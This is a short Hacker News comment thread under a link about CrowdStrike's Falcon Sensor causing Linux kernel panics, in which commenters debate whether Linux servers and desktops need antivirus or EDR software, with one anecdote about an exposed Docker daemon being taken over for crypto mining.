CrowdStrike's Falcon Sensor also linked to Linux kernel panics and crashes

(www.theregister.com)

158 points kenjackson | 1 comments | 22 Jul 24 02:22 UTC | HN request time: 0.211s | source

Show context

ExoticPearTree ◴[22 Jul 24 08:24 UTC] No.41031994[source]▶

People drink the kool-aid and believe that Linux needs antivirus. So many vendors tried and failed at scaring people into buying Linux antivirus that I've lost track over the years.

My perspective is that it is a very very poor idea to have an anti-malware solution running on a Linux system. CrowdStrike is very persistent in their sales pitches and do FUD campaigns better than the competition to convinse people with decision making authority that Linux and Containers and what needs an antivirus.

replies(3): >>41032656 #>>41033791 #>>41036614 #

nikcub ◴[22 Jul 24 12:50 UTC] No.41033791[source]▶

>>41031994 #

Recently helped somebody who accidentally left dockerd open to the internet with no auth. It was hacked, backdoored and running a crypto miner within hours. Only detected when the hosting company emailed him days later because the worm was further scanning other hosts from his machine.

How would you stop, detect and/or remove this threat from this machine on a linux server without antivirus / EDR?

replies(2): >>41034022 #>>41034786 #

1. Ajedi32 ◴[22 Jul 24 14:25 UTC] No.41034786[source]▶

>>41033791 #

Yeah, desktop Linux more obscure and generally used by more technically inclined people so malware is less common, but out of the box its just as vulnerable to viruses as Windows or any other OS that runs user-installed applications with no sandbox.

If we were _really_ serious about endpoint security we'd be pushing business users towards operating systems with more modern security architectures, like Android, iOS or Chrome OS. That would be a lot of work though due to the fact that most legacy software is not compatible with those systems.

↑